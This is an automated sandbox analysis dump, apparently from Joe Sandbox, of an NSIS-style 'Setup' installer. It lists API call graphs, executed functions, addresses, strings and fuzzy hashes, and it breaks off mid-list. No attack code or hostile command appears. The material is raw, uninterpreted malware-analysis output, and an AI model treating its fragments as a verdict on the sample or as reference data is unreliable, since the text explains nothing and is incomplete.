OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                  Executed Functions

                                                                  Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                  • GetClientRect.USER32(?,?), ref: 004051C2
                                                                  • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                    • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                  • ShowWindow.USER32(00000000), ref: 00405313
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                  • ShowWindow.USER32(00000008), ref: 0040535F
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                  • CreatePopupMenu.USER32 ref: 004053A2
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                  • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                  • OpenClipboard.USER32(00000000), ref: 00405437
                                                                  • EmptyClipboard.USER32 ref: 0040543D
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                  • CloseClipboard.USER32 ref: 0040549A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                  • String ID: New install of "%s" to "%s"${
                                                                  • API String ID: 2110491804-1641061399
                                                                  • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                  • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                  • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                  • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                  Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                  APIs
                                                                  • #17.COMCTL32 ref: 004038CE
                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                  • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                  • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                  • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                  • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                  • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                  • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                  • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                  • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                  • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                  • ExitProcess.KERNEL32 ref: 00403B1D
                                                                  • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                  • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                  • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                  • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                  • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                  • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                  • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                  • API String ID: 2435955865-3712954417
                                                                  • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                  • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                  • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                  • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                  Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                  • FindClose.KERNEL32(00000000), ref: 00406318
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: jF
                                                                  • API String ID: 2295610775-3349280890
                                                                  • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                  • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                  • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                  • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                  Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
